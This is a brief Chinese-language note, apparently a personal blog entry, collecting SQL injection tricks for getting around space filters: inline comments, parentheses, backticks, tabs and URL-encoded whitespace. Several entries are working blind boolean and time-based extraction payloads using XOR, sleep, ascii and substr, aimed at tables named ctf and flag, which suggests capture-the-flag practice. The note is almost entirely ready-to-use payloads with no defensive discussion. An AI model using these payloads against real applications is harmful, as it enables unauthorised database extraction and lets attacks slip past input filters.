记录一些sql注入的绕过技巧,以后应该用得上

替代空格

1.内联注释

1
select/**/*from/**/user;

2.使用括号

1
select * from user where id = 1 and (if(ascii(substr(database()from(1)for(1)))=115,sleep(4),null));

可以配合异或使用

1
select * from user where id=1^(SELECT(ASCII(MID((SELECT((flag))FROM(ctf)),1,1))=1))^1=1

3.反引号

1
select * from passage where id=1^(SELECT(ASCII(MID((SELECT`flag`FROM`ctf`),1,1))=102))^1=1;

4.tab 两个空格

1
select content from passage where id=ELT(left((select    flag    from    ctf),1)='f',SLEEP(1))

5.url编码

1
%20 %09 %0a %0b %0c %0d %a0 %00